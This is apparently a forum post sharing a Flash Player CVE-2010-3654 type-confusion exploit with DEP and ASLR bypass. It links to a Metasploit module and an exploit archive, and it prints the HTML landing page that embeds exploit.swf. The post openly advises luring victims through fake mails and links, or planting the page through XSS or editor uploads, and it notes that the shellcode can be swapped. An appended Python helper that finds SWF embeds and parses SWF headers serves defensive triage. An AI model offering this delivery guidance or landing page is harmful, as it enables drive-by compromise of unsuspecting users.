Adobe Flash Player < 10.1.53 .64 Action Script Type Confusion Exploit (DEP+ASLR


herakty


NOTE: All exploits and exploitation techniques are for educational purposes, for training pen testers. USE TARGETS IN VMs (they are proofs of concept, but obviously they work, since they are meant to prove

Vulnerability details

Exploiting Adobe Flash Player on Windows 7

http://www.abysssec.com/blog/2011/04/exploiting-adobe-flash-player-on-windows-7/

Exploit ready and adapted for Metasploit... just fire it... (in this case you should follow the Metasploit WebAttack method)

http://downloads.securityfocus.com/vulnerabilities/exploits/44504-adobe_flashplayer_button.rb

More info on browser attacks with Metasploit

http://defcon.org/images/defcon-17/dc-17-presentations/defcon-17-egypt-guided_missiles_metasploit.pdf

http://www.offensive-security.com/metasploit-unleashed/Browser_Autopwn

http://www.offensive-security.com/metasploit-unleashed/ (everything about Metasploit, and very good for beginners)

If you have a site you can lure people to, through social engineering or other means (fake mails or fake links are social engineering), put this page with the Flash containing the compiled exploit on it... the process launched in this case is CALC.EXE

Flash exploit with source code, and compiled as well (you can use any other shellcode... see the file Real_Ref_Class.as, in the function (public static function shellcode())

http://www.exploit-db.com/sploits/CVE-2010-3654_Win7.zip

HTML page from which you call the Flash with the exploit... if you manage to UPLOAD it to the server by some means... often you can embed Flash through editors, or by using an exploit (WMPAP/METASPLOIT) or XSS

<html>
<head>

<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>Flash Player CVE-2010-3654 Advanced Win7 Exploitation Dep+ASLR Bypass</title>

</head>
<body >

<h1>Abysssec Present :</h1>
<h4> - Step 1: Reading Internal Object Pointer </h4>
<h4> - Step 2: Reading memory values and leaking module imagebase (ASLR bypass)</h4>
<h4> - Step 3: Using another leak for shellcode address</h4>
<h4> - Step 4: Using ROP to call VirtualProtect in (flash10h.ocx) and mark memory as executeable (DEP bypass)</h4>
<h4> - Step 5: Execute Shellcode</h4>
<h4> - Step 6: Wait 3 Second</h4>
<h4> - Step 7: Victory Dance</h4>
<br>
<h4> Questions : shahin@abysssec.com </h4>
<h4> Requests  : info@abysssec.com </h4>

<!-- the SWF carrying the exploit; allowscriptaccess="always" lets it script the page -->
<embed src="exploit.swf" id="flash" quality="high" scale="exactfit" width="450" height="450" name="squambido" align="middle" allowscriptaccess="always" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/>    

</body>
</html>

sweet dreams

NSF-CDC - ANON

teckV
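The post above describes a delivery chain: a landing page that loads exploit.swf through an `<embed>` tag with allowscriptaccess="always", and a compiled SWF whose shellcode lives in Real_Ref_Class.as. The following triage helper is an added example, not code from the post or from Abysssec: it finds the tags on a landing page that load an SWF (embed src, object data, or a "movie" param), and parses the header of a captured SWF (signature, file version, declared length, stage size, frame rate, frame count), inflating CWS files first. SAMPLE_HTML is a constructed copy of the landing page above; build_sample_swf() constructs a minimal SWF for the example, since the real exploit.swf is not on the page. Function names are assumptions made for this example.

```python
"""Triage helper for a Flash landing page and the SWF it loads (added example)."""
import struct
import zlib
from html.parser import HTMLParser

# Constructed sample: a copy of the landing page's embed tag from the post.
SAMPLE_HTML = """<html><head><title>landing</title></head><body>
<embed src="exploit.swf" id="flash" quality="high" scale="exactfit"
 width="450" height="450" name="squambido" align="middle"
 allowscriptaccess="always" type="application/x-shockwave-flash"
 pluginspage="http://www.macromedia.com/go/getflashplayer"/>
</body></html>"""


class SwfEmbedFinder(HTMLParser):
    """Collect every tag that loads a Flash movie plus the attributes that
    matter for browser delivery (src, declared size, allowscriptaccess)."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "embed":
            src = a.get("src", "")
        elif tag == "object":
            src = a.get("data", "")
        elif tag == "param" and a.get("name", "").lower() == "movie":
            src = a.get("value", "")
        else:
            return
        is_swf = (src.lower().split("?")[0].endswith(".swf")
                  or "shockwave-flash" in a.get("type", "").lower())
        if src and is_swf:
            self.hits.append({
                "tag": tag,
                "src": src,
                "allowscriptaccess": a.get("allowscriptaccess", "").lower(),
                "size": (a.get("width"), a.get("height")),
            })


def find_swf_embeds(html):
    finder = SwfEmbedFinder()
    finder.feed(html)
    return finder.hits


def _read_bits(buf, pos, n, signed=False):
    """Read n bits MSB-first starting at absolute bit offset pos."""
    val = 0
    for i in range(n):
        bit = (buf[(pos + i) // 8] >> (7 - (pos + i) % 8)) & 1
        val = (val << 1) | bit
    if signed and n and val & (1 << (n - 1)):
        val -= 1 << n
    return val


def parse_swf_header(data):
    """Parse the SWF header: signature, file version, declared length, stage
    RECT (twips, 20 per pixel), frame rate (8.8 fixed point) and frame count."""
    if len(data) < 8:
        raise ValueError("too short to be a SWF")
    sig, version, length = data[:3], data[3], struct.unpack("<I", data[4:8])[0]
    if sig == b"FWS":
        body = data[8:]
    elif sig == b"CWS":                       # zlib-compressed from byte 8 on
        body = zlib.decompress(data[8:])
    elif sig == b"ZWS":
        raise ValueError("LZMA-compressed SWF (version 13+), not handled here")
    else:
        raise ValueError("not a SWF file")
    nbits = body[0] >> 3                      # RECT: 5-bit field width, 4 fields
    xmin, xmax, ymin, ymax = (_read_bits(body, 5 + i * nbits, nbits, signed=True)
                              for i in range(4))
    rect_bytes = (5 + 4 * nbits + 7) // 8
    lo, hi = body[rect_bytes], body[rect_bytes + 1]   # UI16 LE, 8.8 fixed point
    frame_count = struct.unpack("<H", body[rect_bytes + 2:rect_bytes + 4])[0]
    return {
        "signature": sig.decode(),
        "version": version,                   # 10 = written for Flash Player 10
        "declared_length": length,
        "stage_px": ((xmax - xmin) // 20, (ymax - ymin) // 20),
        "frame_rate": hi + lo / 256,
        "frame_count": frame_count,
    }


def build_sample_swf(compress=True, version=10, width_px=450, height_px=450):
    """Constructed sample: a minimal SWF (stage RECT, 12 fps, 1 frame, End tag)."""
    xmax, ymax = width_px * 20, height_px * 20
    nbits = max(xmax, ymax).bit_length() + 1  # one extra bit for the sign
    bits = format(nbits, "05b") + "".join(format(v, "0%db" % nbits)
                                         for v in (0, xmax, 0, ymax))
    bits += "0" * (-len(bits) % 8)
    rect = int(bits, 2).to_bytes(len(bits) // 8, "big")
    body = rect + struct.pack("<HH", 12 << 8, 1) + b"\x00\x00"
    payload = zlib.compress(body) if compress else body
    sig = b"CWS" if compress else b"FWS"
    return sig + bytes([version]) + struct.pack("<I", 8 + len(body)) + payload


if __name__ == "__main__":
    for hit in find_swf_embeds(SAMPLE_HTML):
        print(hit)
    print(parse_swf_header(build_sample_swf()))
```

Run it against a captured landing page and the SWF it references: an embed with allowscriptaccess="always" pointing at an SWF is the delivery indicator from the post, and the header tells you whether the file is compressed and which Flash Player major version it was built for (the affected player here is < 10.1.53.64; the SWF version alone does not prove the player is vulnerable).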
